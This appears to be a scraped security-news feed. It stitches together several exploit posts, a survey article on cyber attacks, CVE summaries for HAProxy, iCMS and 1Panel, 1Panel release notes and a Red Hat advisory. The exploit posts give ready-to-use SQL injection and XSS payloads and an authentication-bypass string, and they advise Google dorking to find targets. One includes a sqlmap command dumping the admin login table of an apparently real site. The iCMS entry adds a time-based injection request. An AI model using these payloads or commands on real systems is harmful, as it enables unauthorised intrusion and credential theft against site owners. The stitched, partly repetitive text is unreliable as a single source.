FlatApp Premium Admin Dashboard version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : FlatApp - Premium Admin Dashboard 1.0 SQL injection Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://themeforest.net/item/flatapp-premium-admin-dashboard-template/4961564?ref=pixelcave                        |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /business-detail.php?lid=15003 <===== inject here [+] D:\sqlmap>sqlmap.py -u https://wwmrigindiacom/business-detail.php?lid=15003 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dump -D mrigindi_new1 -T admin_loginGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

FlatApp Premium Admin Dashboard 1.0 SQL Injection

Greeva version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Greeva 2.0 Auth By Pass Vulnerability                                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit)                                            | | # Vendor    : https://coderthemes.com/greeva/index.html                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pas = 1'or'1'='1[+] http://127.0.0.1/wsb-patho.com/sbpatho_system/pap_system/dist/auth-login.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Greeva 2.0 SQL Injection

DigaSell Digital Store PHP Script version 1.0.0 suffers from a cross site scripting vulnerability.

**DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting**

Posted Aug 11, 2023

Authored by indoushka

DigaSell Digital Store PHP Script version 1.0.0 suffers from a cross site scripting vulnerability.

tags | exploit, php, xss

SHA-256 | f72dfd55d23408ab5429974dee598db6c2f5f4c1ad279051decdd75964ab240b

Download | Favorite | View

**DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : DigaSell - Digital store PHP Script V1.0.0 XSS Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://codecanyon.net/item/digasell-digital-store-php-script/23580305?s_rank=2                                    |  | # Dork      : "Copyright  © DigaSell All Rights Reserved."                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /browse/tags/if<script>alert(/indoushka/);</script>=2                  [+] Panel       : https://127.0.0.1/codsemcom/digasell/browse/tags/if%3Cscript%3Ealert(/indoushka/);%3C/script%3E=2Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,933)
*   Arbitrary (16,196)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,277)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,344)
*   DoS (23,416)
*   Encryption (2,370)
*   Exploit (51,861)
*   File Inclusion (4,221)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,770)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,671)
*   Local (14,448)
*   Magazine (586)
*   Overflow (12,691)
*   Perl (1,423)
*   PHP (5,145)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,765)
*   Root (3,581)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,886)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,366)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,770)
*   Web (9,663)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,932)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,812)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,428)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,711)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,808)
*   UNIX (9,289)
*   UnixWare (186)
*   Windows (6,573)
*   Other

DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting

By Waqas
The new study has identified a cybersecurity training gap and an alarming lack of preparedness in countering emerging threats.
This is a post from HackRead.com Read the original post: Email Hacking Reigns as Top Cybersecurity Threat, Indusface Study

*   **Sector Vulnerabilities:** Indusface’s research reveals that the Education sector is the most susceptible to cyber attacks, with a staggering 78% of businesses in this domain having experienced such threats.

*   **Email Hacking Dominates:** Email hacking emerged as the most common form of cyber attack, affecting 64% of respondents across various industries, necessitating enhanced training and defences against phishing and related tactics.

*   **Financial Services Resilience:** In contrast, the Financial Services sector demonstrated stronger cyber resilience, with only 26% reporting cyber attacks, potentially due to robust cybersecurity investment and training.

*   **Training Deficits:** The study highlights a concerning lack of employee training in cyber security across various sectors, with 83% of Education sector businesses neglecting this crucial aspect.

*   **Expert Insights:** Venky Sundar, Indusface’s Founder and President, underscores the diverse methods cyber attackers employ and emphasizes the importance of proactive employee training, security assessments, and Web Application and API Protection (WAAP) solutions.

A study conducted by Indusface in July 2023 and recently shared with Hackread.com delved deep into the state of cybersecurity, unearthing insights into the sectors most targeted by cyber attacks and shedding light on the prevailing types of cyber assaults faced by enterprises. Here’s what the company found:

**The Perilous Terrain: A Sector-Wise Analysis**

Indusface embarked on an extensive investigation, surveying 2,200 respondents across 16 diverse industries, to unveil the contours of cyber attacks on businesses. The results showcased an alarming reality – nearly half (49%) of UK businesses had fallen victim to a cyber attack. Such statistics underscored the pressing need for robust cybersecurity strategies in the corporate world.

**Education: The Bullseye of Cyber Attacks**

Within this backdrop, the Education sector emerged as the most besieged by cyber threats, with a staggering 78% of businesses revealing that they had experienced an attack. This revelation demands attention, particularly when coupled with the fact that a significant 83% of organizations within the Education sector were found to lack proactive employee training in cybersecurity – a vulnerability that cybercriminals can exploit.

**Arts, Entertainment, and Recreation: Second in Line**

Coming in second place, the Arts, Entertainment, and Recreation sector encountered cyber attacks at a rate of 68%. Disturbingly, over 30% of businesses in this sector were not actively training their personnel in cybersecurity protocols. This lack of preparation exposes these businesses to a range of attacks, including the ever-pervasive threat of email hacking.

**The Email Hacking Conundrum**

Indeed, email hacking stood tall as the most prevalent form of cyber attack, affecting a significant 64% of respondents from various business domains. This emphasizes the necessity for bolstered training in email security, encompassing a comprehensive approach to thwart phishing attempts, account takeovers, and credential stuffing.

**Navigating the Dangers: Financial Services Bypassed**

Contrasting the widespread cyber attacks on various sectors, the Financial Services industry exhibited resilience, reporting a lower incidence rate of 26%. This positive outcome was possibly influenced by the sector’s commitment to cybersecurity investment and training. It is evident that proactive measures play a pivotal role in safeguarding businesses from cyber threats.

**Expert Insights: Securing the Future**

Venky Sundar, Founder and President of Indusface, elucidated the significance of cybersecurity investment across all sectors. He highlighted that while email hacking remains a prevalent threat, the methods used are diverse, ranging from phishing to sophisticated attacks like SQL injection vulnerabilities.

Sundar emphasized the importance of training employees against phishing attacks, coupled with the implementation of robust security assessments and Web Application and API Protection (WAAP) solutions.

**A Call to Action**

As cyber threats continue to evolve in sophistication and impact, businesses must heed the findings of this research. Implementing comprehensive cybersecurity strategies, investing in training programs, and staying updated with the latest security solutions are imperatives that transcend industry boundaries.

In conclusion, the Indusface study serves as a clarion call to businesses to fortify their cyber defences. The relentless march of technology necessitates a united front against cybercriminals. With the insights gained from this research, businesses can navigate the complex landscape of cyber threats with resilience and vigilance.

**RELATED ARTICLES**

1.  AI Flagged as “Chronic Risk” in UK Gov Risk Register 2023
2.  SSH Remains Most Targeted Service in Cado’s Threat Report
3.  Russian Dark Net Markets Dominate the Global Illicit Drug Trade
4.  Submarine Cables Face Escalating Cybersecurity Threats, Report
5.  US, India, China Most Targeted in DDoS Attacks, StormWall Report

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Email Hacking Reigns as Top Cybersecurity Threat, Indusface Study

HAProxy through 2.0.32, 2.1.x and 2.2.x through 2.2.30, 2.3.x and 2.4.x through 2.4.23, 2.5.x and 2.6.x before 2.6.15, 2.7.x before 2.7.10, and 2.8.x before 2.8.2 forwards empty Content-Length headers, violating RFC 9110 section 8.6. In uncommon cases, an HTTP/1 server behind HAProxy may interpret the payload as an extra request.

CVE-2023-40225

iCMS v7.0.16 was discovered to contain a SQL injection vulnerability via the bakupdata function.

CVE-2023-39806

iCMS v7.0.16 was discovered to contain a SQL injection vulnerability via the where parameter at admincp.php.

\[CVE-ID\]

CVE-2023-39805

\------------------------------------------

\[Description\]

iCMS v7.0.16 was discovered to contain a SQL injection vulnerability

via the where parameter at admincp.php.

\------------------------------------------

\[Vulnerability Type\]

SQL Injection

\------------------------------------------

\[Vendor of Product\]

icmsdev

\------------------------------------------

\[Affected Product Code Base\]

icms V7.0.16 - V7.0.16

\------------------------------------------

\[Affected Component\]

icms<=V7.0.16

\------------------------------------------

\[Attack Type\]

Remote

\------------------------------------------

\[Impact Information Disclosure\]

true

\------------------------------------------

\[Attack Vectors\]

POST /icms/admincp.php?app=database&do=query&frame=iPHP&CSRF\_TOKEN=fe334f6fgxSmDHDpZeekNtohnt-hBYXBAOJkd5xXq\_XXz5vaYOwEoS\_nJrEdZo26EJVC0fA0SkLpfBFFzcE4ly18oxAoBMoCTr22qJ8 HTTP/1.1

Cookie: iCMS\_ADMIN\_AUTH=23f0a4caAp2o-gYF7T1PFGTY0fdLZd43ZdGHuQY1NnyOjOUDHZxyC\_CewgaX5uR1iNHfEz\_Pj20qTaPC\_NZlv9CKoxpPtJ80fBz7nbiMensa6tkGlbYrpw; XDEBUG\_SESSION=11807

field=tkd&pattern=123123&replacement=1231321&where=where+id=1+AND+(SELECT+\*+FROM+(SELECT(SLEEP(10)))testsql)

\------------------------------------------

\[Has vendor confirmed or acknowledged the vulnerability?\]

true

\------------------------------------------

\[Discoverer\]

chubby

\------------------------------------------

\[Reference\]

http://icms.com

http://icmsdev.com

CVE-2023-39805: CVE-2023-39805

1Panel is an open source Linux server operation and maintenance management panel. In version 1.4.3, an arbitrary file write vulnerability could lead to direct control of the server. In the `api/v1/file.go` file, there is a function called `SaveContentthat,It `recieves JSON data sent by users in the form of a POST request. And the lack of parameter filtering allows for arbitrary file write operations. Version 1.5.0 contains a patch for this issue.

**一、安装和升级****1.1 一键安装**

**CentOS/RHEL**

curl -sSL https://resource.fit2cloud.com/1panel/package/quick\_start.sh -o quick\_start.sh && sh quick\_start.sh

**Ubuntu**

curl -sSL https://resource.fit2cloud.com/1panel/package/quick\_start.sh -o quick\_start.sh && sudo bash quick\_start.sh

**Debian**

curl -sSL https://resource.fit2cloud.com/1panel/package/quick\_start.sh -o quick\_start.sh && bash quick\_start.sh

**1.2 在线升级**

登录 1Panel Web 控制台，在页面右下角点击 **【检查更新】** 进行在线升级。

> 更多信息请查阅在线文档：https://1panel.cn/docs/

**二、更新日志****2.1 新特性**

*   【网站】支持 PHP 运行环境类型网站切换版本。 by @zhengkunwang223 in #1748
*   【网站】支持网站设置重定向。 by @zhengkunwang223 in #1731
*   【数据库】支持添加 MySQL 远程数据库。 by @ssongliu in #1744
*   【主机】增加进程守护管理。 by @zhengkunwang223 in #1786

**2.2 功能优化**

*   【网站】网站设置 IPv6 功能优化。 by @zhengkunwang223 in #1732
*   【网站】网站防盗链页面样式优化。 by @zhengkunwang223 in #1807
*   【网站】网站设置页面添加反向代理时支持用户选择传输协议。 by @zhengkunwang223 in #1832
*   【网站】编辑 PHP 运行环境后增加关联应用重建的提示信息。 by @zhengkunwang223 in #1896
*   【应用商店】应用升级时增加备份选项。 by @zhengkunwang223 in #1750
*   【应用商店】已安装应用列表增加 HTTPS 类型端口的跳转功能。 by @zhengkunwang223 in #1870
*   【应用商店】全部应用和已安装应用列表页面样式优化。 by @zhengkunwang223 in #1895
*   【应用商店】应用依赖 Redis 时，创建页面自动填充 Redis 密码。 by @zhengkunwang223 in #1826
*   【数据库】数据库密码校验规则优化。 by @ssongliu in #1815
*   【数据库】数据库连接信息样式优化。 by @ssongliu in #1857
*   【容器】容器创建页面部分字段翻译优化。 by @SkyAerope in #1797
*   【主机】文件列表记录文件浏览器最后一次访问的路径。 by @zhengkunwang223 in #1753
*   【主机】文件列表页面适配移动端。 by @wangdan-fit2cloud in #1730
*   【主机】监控页面调整数据默认采集间隔和保存时间。 by @ssongliu in #1795
*   【面板设置】创建系统快照前停止所有定时任务。 by @ssongliu in #1888
*   【面板设置】服务器地址支持设置域名。 by @ssongliu in #1778
*   【面板设置】备份账号页面部分按钮样式优化。 by @ssongliu in #1893
*   【面板设置】创建快照逻辑优化。 by @ssongliu in #1805
*   【系统】登录页增加切换语言选项。 by @zhengkunwang223 in #1752
*   【系统】部分页面样式适配移动端。 by @wangdan-fit2cloud in #1891
*   【系统】移除不必要的 SSH Session 连接。 by @LeeEirc in #1780
*   【系统】部分页面分页排序样式优化。 by @ssongliu in #1821
*   【系统】创建抽屉页面不再动态显示名称。 by @ssongliu in #1777

**2.3 问题修复**

*   【网站】修复了部分场景下创建 PHP 运行环境异常的问题。 by @zhengkunwang223 in #1882
*   【应用商店】修复了应用升级后无法编辑最新配置的问题。 by @zhengkunwang223 in #1824
*   【应用商店】修复了更新应用列表后可能出现多个同名应用的问题。 by @zhengkunwang223 in #1827
*   【应用商店】修复了 Cloudreve 升级后数据丢失的问题。 by @zhengkunwang223 in #1822
*   【应用商店】修复了编辑应用时关闭高级设置之后没有提示端口放开的问题。 by @zhengkunwang223 in #1887
*   【应用商店】修复了安装应用时数据库密码包含 & $ 等特殊字符时提示错误的问题。 by @zhengkunwang223 in #1809
*   【数据库】修复了数据库日志监听未刷新的问题。 by @ssongliu in #1823
*   【容器】修复了编辑容器时不显示手动挂载的挂载卷的问题。 by @ssongliu in #1783
*   【容器】修复了编辑容器时由于端口冲突导致容器被删除的问题。 by @ssongliu in #1770
*   【主机】修复了文件压缩时无法选择文件夹的问题。 by @zhengkunwang223 in #1802
*   【主机】修复了当 SSH 登录日志涉及多个年份时导致数据异常的问题。 by @ssongliu in #1785
*   【面板设置】修复了同步快照路径错误的问题。 by @ssongliu in #1863
*   【系统】修复了系统安装在根目录时导致升级失败的问题。 by @ssongliu in #1776

**2.4 应用商店**

*   新增 JumpServer。 by @wojiushixiaobai in 1Panel-dev/appstore#238
*   新增 SFTPGo。 by @wanghe-fit2cloud in 1Panel-dev/appstore#269
*   新增 PGAdmin4。 by @wojiushixiaobai in 1Panel-dev/appstore#246
*   新增 frp。 by @okxlin in 1Panel-dev/appstore#299
*   新增 Discuz。 by @okxlin in 1Panel-dev/appstore#227
*   新增 Nextcloud。 by @okxlin in 1Panel-dev/appstore#299
*   新增 Domain Admin。 by @mouday in 1Panel-dev/appstore#278
*   新增 emlog。 by @emlog in 1Panel-dev/appstore#276
*   新增 ZFile。 by @okxlin in 1Panel-dev/appstore#299
*   新增 MeiliSearch。 by @CyJaySong in 1Panel-dev/appstore#219
*   新增 ChatGPT Web。 by @okxlin in 1Panel-dev/appstore#274
*   新增 Home Assistant。 by @okxlin in 1Panel-dev/appstore#299
*   AdGuardHome 版本升级至 v0.107.36。 by @renovate in 1Panel-dev/appstore#293
*   OpenResty 版本升级至 1.21.4.2-0。 by @wuhang2003 in 1Panel-dev/appstore#300
*   Tailchat 版本升级至 v1.8.8。 by @renovate in 1Panel-dev/appstore#305
*   青龙 版本升级至 v2.16.0。 by @renovate in 1Panel-dev/appstore#306
*   ddns-go 版本升级至 v5.6.0。 by @renovate in 1Panel-dev/appstore#307
*   Memos 版本升级至 v0.14.3。 by @renovate in 1Panel-dev/appstore#304
*   Jenkins 版本升级至 v2.418。 by @renovate in 1Panel-dev/appstore#312
*   Cloudreve 版本升级至 v3.8.2。 by @renovate in 1Panel-dev/appstore#308
*   Alist 版本升级至 v3.25.1。 by @renovate in 1Panel-dev/appstore#309

**2.5 安全更新**

*   修复了部分文件接口存在任意文件读取漏洞的问题。 (CVE-2023-39964)
*   修复了部分文件接口存在任意文件下载漏洞的问题。 (CVE-2023-39965)
*   修复了部分文件接口存在任意文件写入漏洞的问题。 (CVE-2023-39966)

CVE-2023-39966: Release v1.5.0 · 1Panel-dev/1Panel

Red Hat Security Advisory 2023-4591-01 - Red Hat Update Infrastructure offers a highly scalable, highly redundant framework that enables you to manage repositories and content. It also enables cloud providers to deliver content and updates to Red Hat Enterprise Linux instances. Issues addressed include bypass and denial of service vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: RHUI 4.5.0 release - Security, Bug Fixes, and Enhancements  
Advisory ID:       RHSA-2023:4591-01  
Product:           Red Hat Update Infrastructure  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4591  
Issue date:        2023-08-09  
CVE Names:         CVE-2023-30608 CVE-2023-31047   
=====================================================================

1. Summary:

An updated version of Red Hat Update Infrastructure (RHUI) is now  
available. RHUI 4.5 fixes several security and operational bugs and also  
adds several new features.

2. Relevant releases/architectures:

RHUI 4 for RHEL 8 - noarch

3. Description:

Red Hat Update Infrastructure (RHUI) offers a highly scalable, highly  
redundant framework that enables you to manage repositories and content. It  
also enables cloud providers to deliver content and updates to Red Hat  
Enterprise Linux (RHEL) instances.

Security Fix(es):  
* Django: Potential bypass of validation when uploading multiple files  
using a single form field (CVE-2023-31047)

* sqlparse: Parser contains a regular expression that is vulnerable to  
ReDOS (Regular Expression Denial of Service) (CVE-2023-30608)

This RHUI update fixes the following bugs:

* Previously, the `rhui-manager` command used the `logname` command to  
obtain the login name. However, when `rhui-manager` is run using the  
`rhui-repo-sync` cron job, a login name is not defined. Consequently,  
emails sent by the cron job contained the error message `logname: no login  
name`. With this update, `rhui-manager` does not obtain the login name  
using the `logname` command and the error message is no longer generated.

* Previously, when an invalid repository ID was used with the  
`rhui-manager` command to synchronize or delete a repository, the command  
failed with following error:  
`An unexpected error has occurred during the last operation.`  
Additionally, a traceback was also logged.   
With this update, the error message has been improved and failure to run no  
longer logs a traceback.

This RHUI update introduces the following enhancements:

* With this update, the client configuration RPMs in `rhui-manager` prevent  
subscription manager from automatically enabling `yum` plugins. As a  
result, RHUI repository users will no longer see irrelevant messages from  
subscription manager. (BZ#1957871)

* With this update, you can generate machine-readable files with the status  
of each RHUI repository. To use this feature, run the following command:  
`rhui-manager --non-interactive status --repo_json <output file>`  
 (BZ#2079391)

* With this update, the `rhui-manager` CLI command uses a variety of unique  
exit codes to indicate different types of errors. For example, if you  
attempt to add a Red Hat repository that has already been added, the  
command will exit with a status of 245. However, if you attempt to add a  
Red Hat repository that does not exist in the RHUI entitlement, the command  
will exit with a status of 246. For a complete list of codes, see the  
`/usr/lib/python3.6/site-packages/rhui/common/rhui_exit_codes.py` file.

4. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For detailed instructions on how to apply this update, see:  
https://access.redhat.com/documentation/en-us/red_hat_update_infrastructure/4/html/migrating_red_hat_update_infrastructure/assembly_upgrading-red-hat-update-infrastructure_migrating-red-hat-update-infrastructure

For other information, see the product documentation:  
https://access.redhat.com/documentation/en-us/red_hat_update_infrastructure/4

5. Bugs fixed (https://bugzilla.redhat.com/):

1957871 - [RFE} Client rpms created in RHUI don't prevent auto-enable of subscription manager plugins  
2079391 - Feature request to provide sync/repo status of each repo in a JSON file for automated monitoring  
2187903 - CVE-2023-30608 sqlparse: Parser contains a regular expression that is vulnerable to ReDOS (Regular Expression Denial of Service)  
2192565 - CVE-2023-31047 python-django: Potential bypass of validation when uploading multiple files using one form field

6. JIRA issues fixed (https://issues.redhat.com/):

RHUI-217 - [RFE] Client rpms created in RHUI don't prevent auto-enable of subscription manager plugins  
RHUI-263 - [RFE] Bug 2079391 - Feature request to provide sync/repo status of each repo in a JSON file for automated monitoring  
RHUI-356 - "logname: no login name" appears, twice, in e-mails sent by the rhui-repo-sync cron job  
RHUI-395 - Change error reporting of rhui-manager to be configurable  
RHUI-424 - repo deletion for an un-added repo results in a traceback  
RHUI-430 - Installation fails on RHEL 8.9  
RHUI-75 - repo sync for an un-added repo results in a traceback

7. Package List:

RHUI 4 for RHEL 8:

Source:  
python-django-3.2.19-1.0.1.el8ui.src.rpm  
python-sqlparse-0.4.4-1.0.1.el8ui.src.rpm  
rhui-installer-4.5.0.1-1.el8ui.src.rpm  
rhui-tools-4.5.0.5-1.el8ui.src.rpm

noarch:  
python39-django-3.2.19-1.0.1.el8ui.noarch.rpm  
python39-sqlparse-0.4.4-1.0.1.el8ui.noarch.rpm  
rhui-installer-4.5.0.1-1.el8ui.noarch.rpm  
rhui-tools-4.5.0.5-1.el8ui.noarch.rpm  
rhui-tools-libs-4.5.0.5-1.el8ui.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

8. References:

https://access.redhat.com/security/cve/CVE-2023-30608  
https://access.redhat.com/security/cve/CVE-2023-31047  
https://access.redhat.com/security/updates/classification/#moderate

9. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk0/U2AAoJENzjgjWX9erEb/8P/jYIo/4EGwCzZUR1npbmdew7  
5p4Lb3Nun23gnBGKDLrbbQqQjyjNbzbzlmjxVAfYnNTNqDHurCZ8SCsLitXR7CN6  
fQrMMCN7xAXjfTLNHl/w9QANqKGkfRa9pf5rRSvufgrh9XSvzlzPpzuihtUsBRjH  
MFEtA3QOiuvyJKXzqWTdWqt0NPCycSfJnm5MhI94C8UeVlFAdm0yEYMDfhV6iRFE  
RJx/LITiaks4FQ1RxAumkqoUrmfk+jsim0a5unfq+5hWubBFAvDo6VXpMPL20pcZ  
MJyVkay6aQQg7dmCzXyXW8kGy/ZwYfjCML1qabh6aLW4dTz5saj6G8UbZiMeKfrh  
SPTEMJbJU0pH7UIGgB2/v2xffsdmTkxgCY0xu75eokcWa4PSRE3UsZ7HRy5aAJRk  
uEWizCXHjQw9HkPnlTcOaQKLS3Fv9qG2tn6XWxmHlo2VrL88rDlmylyL/1euFDHQ  
ihaDj5AuHNWrZgBgghKPr89BkO6AiPAoYvg2Ld2bxXtMUohTVdxM00EVTmZImR1M  
N0NxrpFqQJPFfiN2MFmdl90pzLvwLYcMM7TTyBGxb6J9bSuP2/gEHsDBth7+m17n  
dmwym0w5xv9Z+yMF9KgdcDffBXnzkFdv/tSSh6sFzqpFGtMvKfyGbFAzkx3SG9MG  
SXC8b0Et+9GnN9s7cg/K  
=UP7R  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4591-01

DriverPack Solution CMS version 17.11.108 suffers from a cross site scripting vulnerability.

**DriverPack Solution CMS 17.11.108 Cross Site Scripting**

Posted Aug 10, 2023

Authored by indoushka

DriverPack Solution CMS version 17.11.108 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | e6bbd0f2f85c5a85db0341ad4fa0a655765bd7b91a5cc41a6d0b07469ab56025

Download | Favorite | View

**DriverPack Solution CMS 17.11.108 Cross Site Scripting**

    ====================================================================================================================================| # Title     : DriverPack Solution CMS v 17.11.108 Xss Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://driverpack.io/                                                                                             |  | # Dork      : n/a                                                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] Use xss payload : _%3C/script%3E%3Cscript%3Eprompt(/indoushka/)%3C/script%3E&password=zeb[+] http://target_site/en?email=_%3C/script%3E%3Cscript%3Eprompt(/indoushka/)%3C/script%3E&password=zebGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,928)
*   Arbitrary (16,193)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,275)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,344)
*   DoS (23,416)
*   Encryption (2,370)
*   Exploit (51,848)
*   File Inclusion (4,221)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,768)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,670)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,144)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,759)
*   Root (3,580)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,886)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,364)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,767)
*   Web (9,662)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,930)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,810)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,423)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,711)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,805)
*   UNIX (9,289)
*   UnixWare (186)
*   Windows (6,572)
*   Other

Tag

#sql